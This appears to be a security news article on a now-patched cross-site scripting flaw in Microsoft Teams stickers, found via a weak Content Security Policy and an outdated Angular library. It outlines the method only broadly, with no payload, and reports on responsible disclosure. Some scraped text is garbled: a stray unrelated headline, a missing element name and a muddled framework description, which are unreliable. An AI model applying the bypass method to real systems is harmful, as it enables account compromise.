**_\[FREE On-demand Event: Join Keeper Security’s Zane Bond in a Threatpost roundtable and learn how to securely access your machines from anywhere and share sensitive documents from your home office. WATCH HERE.\]_**

Journalists Emerge as Favored Attack Target for APTs

The friendly image sent by your colleague on a teleconference may be hiding a malicious secret

The friendly image sent by your colleague on a teleconference may be hiding a malicious secret

A security researcher has found that attackers could abuse the popular sticker feature in Microsoft Teams to conduct cross-site scripting (XSS) attacks.

Microsoft Teams, alongside comparable teleconferencing services including Zoom, have experienced a surge in popularity over the past few years.

The Covid-19 pandemic forced organizations to adopt work-from-home models whenever possible. In the aftermath, employees have often been given the option of either staying remote or going hybrid.

With so many users, any vulnerability in Microsoft Teams could have widespread impact. As such, cybersecurity researchers, including Gais Cyber Security’s senior cybersecurity specialist Numan Turle, have examined the software for potential flaws.

**Sticky subject**

In 2021, Turle uncovered CVE-2021-24114. Issued a CVSS score of 5.7, the bug was discovered in the preview process of images sent via Teams to leak Skype tokens (PDF) and trigger an account takeover vulnerability in Teams iOS.

A year on, the researcher decided to examine Microsoft Teams’ sticker function for new security issues.

**RELATED** Vulnerability in Microsoft Teams granted attackers access to emails, messages, and personal files

When a sticker is sent via Teams, the platform converts it into an image and uploads the content as ‘RichText/HTML’ in the subsequent message.

Turle inspected the HTML request using Burp Suite and tried out typical attributes – to no avail, due to the protections offered by Microsoft’s Content Security Policy (CSP).

CSP is designed to mitigate a range of common web attacks, including XSS.

However, after plugging the CSP into Google’s CSP Evaluator tool, the researcher found a CSP defect – the field was flagged as unsafe, which paved the way for potential HTML injection attacks against multiple domains.

**Trying a different angle**

Microsoft had plugged these security holes via Azure domain changes. So, after digging deeper and inspecting Teams in-browser, Turle uncovered a JavaScript element, , that could be used as an alternative.

jQuery with Angular is a JavaScript framework for managing HTML and CSS interactions. However, this version was out of date and vulnerabilities in the outdated version (1.5.14) – could be utilized to bypass the CSP.

Read more of the latest security vulnerability news

After crafting a malicious iframe with help from HTML encoding, the researcher was able to create a malicious payload, sent via the stickers function in Teams, to trigger XSS, obtained through user interaction.

Turle disclosed the XSS issue to Microsoft on January 6. The vulnerability was patched in March and the researcher was awarded a $6,000 bug bounty.

_The Daily Swig_ has reached out to Gais Cyber Security and Microsoft and we will update when we hear back.

Full details can be found in a technical blog post from Turle.

**INTERVIEW** Vivaldi browser founder Jon von Tetzchner puts privacy at the center of development

Tag

#pdf